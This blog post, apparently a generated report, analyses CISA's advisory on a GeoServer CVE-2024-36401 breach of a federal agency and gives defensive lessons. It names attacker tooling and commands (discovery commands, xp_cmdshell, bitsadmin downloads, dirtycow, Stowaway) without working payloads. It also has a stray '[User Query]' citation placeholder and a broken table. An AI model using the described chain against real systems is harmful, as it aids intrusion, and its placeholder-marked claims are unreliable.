Tuesday, September 23, 2025

The Widespread Exploitation of GeoServer

 

The Attacker's Playbook: Tactics, Techniques, and Procedures (TTPs)


CISA's advisory provides a granular, technical breakdown of the threat actor's actions, offering a valuable playbook for network defenders. The attacker's TTPs represent a calculated blend of widely available commodity tools and more sophisticated, multi-stage techniques.

The attack unfolded in a series of logical steps, each mapping to a specific Tactic in the MITRE ATT&CK framework.

  • Reconnaissance: The threat actors began by scanning the FCEB agency's public-facing GeoServer instances. CISA's analysis of web logs revealed signatures associated with Burp Suite Burp Scanner, a common tool for web vulnerability assessment.1 This activity, originating from the same IP address later used for the exploit, confirms a targeted reconnaissance effort.1 This maps to MITRE ATT&CK Tactic: T1595.002, "Active Scanning."

  • Initial Access: The attackers exploited CVE-2024-36401 on two separate GeoServer instances to gain RCE via "eval injection".1 This action, which provides an initial foothold in the network, is mapped to Tactic: T1190, "Exploit Public-Facing Application."

  • Persistence: Once inside, the actors worked to ensure they could maintain access to the network. They established persistence primarily through web shells (such as the China Chopper web shell) on internet-facing hosts, created cron jobs, and manipulated valid accounts, including creating and later deleting new accounts.1 This maps to Tactic: TA0003, "Persistence."

  • Privilege Escalation: To expand their control, the attackers attempted to escalate privileges using the publicly available dirtycow tool, which targets a separate vulnerability, CVE-2016-5195.1 This is an example of an attacker using a known, unpatched kernel-level flaw to elevate their permissions, a common post-exploitation technique. This maps to Tactic: T1068, "Exploitation for Privilege Escalation."

  • Discovery: With an initial foothold and elevated privileges, the actors began to map the internal network. They executed a range of host discovery commands, including uname -a, df -h, env, ps -aux, and ipconfig.1 They also utilized open-source tools like
    fscan and linux-exploit-suggester2.pl to scan internal systems for further compromise opportunities.1 This maps to Tactic: TA0007, "Discovery."

  • Lateral Movement: The attackers used the compromised GeoServer 1 as a launchpad to move laterally to a web server and then to an SQL server.1 This was accomplished by enabling
    xp_cmdshell for RCE on GeoServer 1, demonstrating a seamless transition between external and internal assets.1 This maps to Tactic: TA0008, "Lateral Movement."

  • Command and Control (C2): The threat actors used standard living-off-the-land tools like PowerShell and bitsadmin getfile to download additional payloads.1 For C2 communication, they established a connection using
    Stowaway, a multi-level proxy tool designed to bypass intranet restrictions.1 They also established a second C2 connection as a backup, a clear indication of a resilient and persistent attack strategy.1 This maps to Tactic: TA0011, "Command and Control."

The TTPs employed in this incident reveal a fascinating duality. The initial breach was enabled by a fundamental, widely-known vulnerability, which attackers identified using a common, off-the-shelf scanner. However, once inside, the actors did not rely on simple, one-off attacks. They deployed sophisticated, multi-stage tactics to establish persistence and evade detection. This blend of commodity exploitation and professional-grade post-compromise activity highlights a crucial development in the threat landscape: the barrier to entry for gaining initial access has been lowered, allowing a wider range of threat actors to execute campaigns that quickly escalate in sophistication.

Attacker TTPs Mapped to MITRE ATT&CK

Tactic

Reconnaissance

Initial Access

Persistence

Persistence

Privilege Escalation

Discovery

Discovery

Lateral Movement

Lateral Movement

Command and Control

Command and Control


6. A Global Threat: The Widespread Exploitation of GeoServer


The breach of the FCEB agency was not an isolated, targeted incident but rather a single point of success within a much broader, global wave of opportunistic exploitation. Data from multiple threat intelligence services confirm the pervasive nature of the threat surface. OSINT search engine ZoomEye tracked over 16,000 GeoServer servers exposed online [User Query]. Separately, Cortex Xpanse reported 7,126 publicly exposed GeoServer instances across 99 countries in March and April 2025, a number that decreased slightly to 3,706 by May 2025.11 On July 24, 2024, the Shadowserver Foundation, a security analyst organization, identified 6,635 instances that were likely vulnerable to CVE-2024-36401.6 This extensive attack surface highlights a fundamental and widespread vulnerability that transcends geographical and industry boundaries.

The diverse nature of the malicious payloads delivered and the motivations behind the attacks further demonstrate the commoditization of this exploit. Threat researchers have observed multiple campaigns targeting the vulnerability to spread a variety of malware. These include botnet families such as Mirai variants (JenX, gayfemboy) and PolarEdge.10 Other attackers have deployed cryptominers, tools for clandestine income generation that monetize compromised systems' internet bandwidth and processing power.10 Additional backdoors like Goreverse and SideWalk have also been observed.14 Fortinet research has noted that SideWalk, a sophisticated Linux backdoor, is linked to the Chinese state-sponsored group APT41.14 This attribution suggests that while the exploit is widely available and used by common cybercriminals, it is also being leveraged by advanced, state-backed actors for espionage purposes.16

The global distribution of these attacks underscores an opportunistic and far-reaching threat landscape. Researchers have observed exploitation attempts targeting IT service providers in India, government entities in Belgium, technology companies in the U.S., and telecommunications firms in Brazil and Thailand.14 This lack of concentration in a single region or industry suggests that attackers are indiscriminately scanning the internet for any exposed, vulnerable asset. The FCEB breach was therefore not a unique event but a specific and successful instance of a widespread, automated campaign. This global context is crucial for understanding that even organizations with robust security protocols can be put at risk simply by having a publicly exposed, unpatched server.


7. CISA's Verdict: Lessons Learned and Strategic Failures


In its official advisory, CISA provided a detailed analysis of the incident, identifying three key failures that allowed a known vulnerability to become a successful network compromise.1 These findings serve as critical lessons for all organizations, highlighting systemic weaknesses that extend beyond a single breach.

  • Vulnerabilities Not Promptly Remediated: The most direct failure was the agency's inability to patch its GeoServer instances in a timely manner.1 The vulnerability was publicly disclosed on June 30, 2024, yet the first server was breached on July 11, and a second on July 24.1 This was despite the fact that CISA added the vulnerability to its KEV Catalog on July 15, which, under Binding Operational Directive (BOD) 22-01, established an August 5 deadline for remediation.1 The breach occurred before this deadline, demonstrating that even with a clear, mandatory directive, the operational challenges of timely remediation remain significant.

  • Untested Incident Response Plan (IRP): The agency's IRP was found to be inadequate and untested.1 It lacked clear procedures for engaging and granting access to third parties, which delayed CISA's response efforts.1 For example, CISA had to go through the agency's change control board process to deploy its own EDR agents, an administrative hurdle that could have been identified and resolved through a simple tabletop exercise.1 This failure reveals a critical gap between a theoretical plan and the operational reality of a crisis.

  • Inadequate Monitoring and Protection: The malicious activity went undetected for approximately three weeks after the initial compromise.1 The agency missed an opportunity for earlier detection, as an alert from GeoServer 1 was not observed.1 Furthermore, a public-facing web server, which the attackers later moved to, lacked any form of endpoint protection.1 These lapses in continuous monitoring and a lack of universal endpoint protection created a blind spot that allowed the attackers to operate freely and move laterally without triggering an immediate alarm.

The CISA advisory makes a strong case that the breach was not caused by a single, catastrophic failure but by a combination of breakdowns in foundational security practices. The lack of a rapid patching program, an untested IRP, and poor EDR monitoring created a perfect storm, allowing a relatively simple exploit to metastasize into a successful network compromise with lateral movement and established persistence. This highlights the importance of a holistic and integrated security program, where all components—from vulnerability management to incident response—are robust and integrated to protect against the full lifecycle of an attack.


8. Comparison to Past Breaches: Recurring Themes in Government Compromises


The GeoServer incident, while unique in its technical specifics, shares a number of recurring themes with past major cyberattacks on the U.S. government. By contextualizing this breach within a historical perspective, a pattern of persistent, fundamental security failures becomes apparent.

  • OPM Breach (2015): The Office of Personnel Management (OPM) breach exposed the sensitive data of over 22 million current and former federal employees.18 The OPM breach was a stark lesson in the catastrophic consequences of lax data security and access controls.19 While the GeoServer breach's focus was on network access and lateral movement rather than a single, massive data exfiltration event, both incidents underscore the vulnerability of government agencies to sophisticated threats, whether from state-sponsored actors or criminal syndicates.18

  • SolarWinds Supply Chain Attack (2020): This incident highlighted the profound risk of supply chain vulnerabilities, where malicious code was injected into legitimate software updates.18 While the GeoServer breach was an exploitation of a known flaw rather than a sophisticated zero-day, it still exposed a critical software supply chain weakness in the form of a vulnerable underlying library.3 The lesson from both is that an organization's security posture is only as strong as its weakest link, whether that link is a third-party vendor or a foundational open-source library.

  • Colonial Pipeline Ransomware Attack (2021): This attack exposed the vulnerability of critical infrastructure to ransomware, shutting down the largest fuel pipeline in the United States.18 The initial entry point was reportedly an inactive VPN account that lacked multi-factor authentication.21 This is perhaps the most relevant comparison to the GeoServer breach. Both incidents were not the result of a novel, unknown threat. Instead, they were successful exploits of known, unpatched vulnerabilities and a failure to enforce basic security hygiene. The Colonial Pipeline attack, like the GeoServer breach, demonstrated that a relatively simple security lapse could have cascading, multi-layered consequences that impact an entire organization's operations.

The evolution of government cyberattacks shows a clear shift. Past incidents, such as the OPM breach, were primarily focused on massive data theft. More recent incidents, including the Colonial Pipeline attack and the TTPs observed in the GeoServer breach, show a tactical shift toward operational disruption and establishing persistent footholds for a wide range of malicious activities.14 The GeoServer attackers moved laterally from geospatial data servers to a web server and an SQL server, indicating a multifaceted objective that extends beyond simple data theft and into the realm of network control and disruption.1

The most profound lesson from this historical comparison is the persistence of fundamental failures. Regardless of the attacker's motivation or the sophistication of their TTPs, the core weaknesses exploited remain remarkably consistent: unpatched systems, untested incident response plans, and inadequate visibility. This demonstrates that government and enterprise security are still grappling with the fundamentals of vulnerability management and incident response, even as attacker capabilities and the scale of the threat grow.


9. Actionable Guidance for Cyber Resiliency


The GeoServer breach is a pivotal case study in the consequences of neglecting foundational cybersecurity practices. It is a clarion call for a strategic re-evaluation of an organization's security posture, urging a move beyond simple compliance to a state of genuine operational resilience. Based on the analysis of this incident, the following recommendations are provided as a framework for building a more resilient cyber defense.

  • Prioritize an Intelligence-Driven Vulnerability Management Program: The CISA KEV Catalog is not merely a list; it is a mandate for action. Organizations must operationalize this intelligence by implementing a continuous process to identify and prioritize the remediation of KEVs, particularly on public-facing assets.22 A "patch or perish" policy should be enforced for critical internet-accessible systems, with a rapid remediation Service Level Agreement (SLA) that accounts for the diminishing window of time between disclosure and active exploitation.1

  • Develop and Exercise a Comprehensive Incident Response Plan: An IRP is a living document that must be regularly tested and refined. The agency's failure to engage CISA and provide necessary access without administrative hurdles is a testament to the importance of proactive planning.1 The plan must clearly define roles, responsibilities, and procedures for engaging both internal teams and external partners like CISA. Tabletop exercises should be conducted at a minimum of once per year to identify and resolve these procedural gaps before a real crisis occurs.1

  • Enhance Network Visibility and Endpoint Protection: The three-week detection gap and the lack of endpoint protection on a public-facing web server were critical failures.1 All public-facing systems, regardless of their function or perceived importance, must have continuous EDR monitoring. Furthermore, logs should be centralized in an out-of-band location to ensure they cannot be tampered with or deleted by attackers during an incident.1 Continuous review of EDR alerts and network traffic is essential to detect and respond to malicious activity in its earliest stages.

  • Mitigate Open-Source Supply Chain Risks: The GeoServer breach highlights the criticality of vetting and monitoring open-source dependencies. Organizations should implement a Software Bill of Materials (SBOM) technology to track vulnerabilities in their codebase and underlying libraries.9 A formal process for monitoring security advisories from open-source projects and their foundational components must be established to address vulnerabilities before they are exploited in the wild.


10. Conclusion: The Path Forward


The GeoServer breach of a U.S. federal agency is a pivotal case study that encapsulates the enduring vulnerabilities of foundational security practices in the face of a rapidly evolving threat landscape. The incident was not a consequence of an advanced, nation-state-level zero-day exploit but a successful attack on a known vulnerability that was easily identified and exploited. The lessons learned from this failure—the urgency of patching, the necessity of a tested IRP, and the need for comprehensive monitoring—are not novel, but their catastrophic consequences in a federal context demand immediate and decisive action. The path forward requires a strategic commitment to proactive, intelligence-led defense, moving beyond a reactive, checklist-based approach to a posture of continuous readiness and resilience.

Works cited

  1. CISA Shares Lessons Learned from an Incident Response ..., accessed September 23, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-266a

  2. CVE-2024-36401: Vulnerability in OSGeo GeoServer GeoTools - Broadcom Inc., accessed September 23, 2025, https://www.broadcom.com/202407017-cve-2024-36401-vulnerability-in-osgeo-geoserver-geotools

  3. GeoServer RCE Vulnerability (CVE-2024-36401) Being Exploited In the Wild - SonicWall, accessed September 23, 2025, https://www.sonicwall.com/blog/geoserver-rce-vulnerability-cve-2024-36401-being-exploited-in-the-wild

  4. GeoServer, accessed September 23, 2025, https://geoserver.org/

  5. About - GeoServer, accessed September 23, 2025, https://geoserver.org/about/

  6. 6600+ Vulnerable GeoServer instances Exposed to the Internet, accessed September 23, 2025, https://cybersecuritynews.com/vulnerable-geoserver-instances-exposed/

  7. Delivering the power of location data for public sector impact - Open Access Government, accessed September 23, 2025, https://www.openaccessgovernment.org/delivering-the-power-of-location-data-for-public-sector-impact/198043/

  8. CVE-2024-36401 Detail - NVD, accessed September 23, 2025, https://nvd.nist.gov/vuln/detail/cve-2024-36401

  9. CVE-2024-36401: GeoServer RCE Vulnerability Analysis - OPSWAT, accessed September 23, 2025, https://www.opswat.com/blog/cve-2024-36401-in-open-source-geoserver-exposes-systems-to-remote-code-execution

  10. CVE-2024-36401 - CVE Details & Analysis | SOCRadar Labs CVE Radar, accessed September 23, 2025, https://socradar.io/labs/app/cve-radar/CVE-2024-36401

  11. Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell ..., accessed September 23, 2025, https://unit42.paloaltonetworks.com/attackers-sell-your-bandwidth-using-sdks/

  12. CISA says hackers breached federal agency using GeoServer exploit - Bleeping Computer, accessed September 23, 2025, https://www.bleepingcomputer.com/news/security/cisa-says-hackers-breached-federal-agency-using-geoserver-exploit/

  13. CVE-2024-36401 Remote Code Execution (RCE) vulnerability in evaluating property name expressions - GeoServer, accessed September 23, 2025, https://geoserver.org/vulnerability/2024/09/12/cve-2024-36401.html

  14. Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401 ..., accessed September 23, 2025, https://www.fortinet.com/blog/threat-research/threat-actors-exploit-geoserver-vulnerability-cve-2024-36401

  15. Highlights of the Year in Review | The ... - Shadowserver 2024, accessed September 23, 2025, https://www.shadowserver.org/news/shadowserver-2024-highlights-of-the-year-in-review/

  16. Critical GeoServer Flaw Enabling Global Hack Campaigns - BankInfoSecurity, accessed September 23, 2025, https://www.bankinfosecurity.com/critical-geoserver-flaw-enabling-global-hack-campaigns-a-26225

  17. Attacks involving GeoServer exploit, botnets intensify | SC Media, accessed September 23, 2025, https://www.scworld.com/brief/attacks-involving-geoserver-exploit-botnets-intensify

  18. The Top 7 Cyberattacks on U.S. Government: A closer look at the evolving landscape of cybersecurity - SecurityScorecard, accessed September 23, 2025, https://securityscorecard.com/blog/top-cyberattacks-on-us-government/

  19. FAQs - OPM, accessed September 23, 2025, https://www.opm.gov/cybersecurity-resource-center/faqs/

  20. Cybersecurity, government experts are aghast at security failures in DOGE takeover, accessed September 23, 2025, https://cyberscoop.com/musk-doge-opm-treasury-breach/

  21. Top 5 Cyber Attacks on Government - Wire, accessed September 23, 2025, https://wire.com/en/blog/top-government-cyberattacks-lessons

  22. What is CISA KEV Known Exploited Vulnerability, and how to use it in prioritization?, accessed September 23, 2025, https://phoenix.security/what-is-cisa-kev/

  23. Known Exploited Vulnerabilities Catalog | CISA, accessed September 23, 2025, https://www.cisa.gov/known-exploited-vulnerabilities-catalog
at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

ASHRAE Standard 90.4-2019

 The correct temperature range recommended by ASHRAE Standard 90.4-2019 for maximum uptime and hardware life is 64⁰ and 81⁰ F . ASHRAE and ...

  • boardsi - summary - review
     Summarization of hundreds of comments on Reddit. Ineffective Service: The users explicitly states, "Confirmed that it doesn't w...
  • Privacy Policy, Flipp
    Based on a review of the provided Privacy Policy , here are some potential legal implications and issues that should be addressed: Scope a...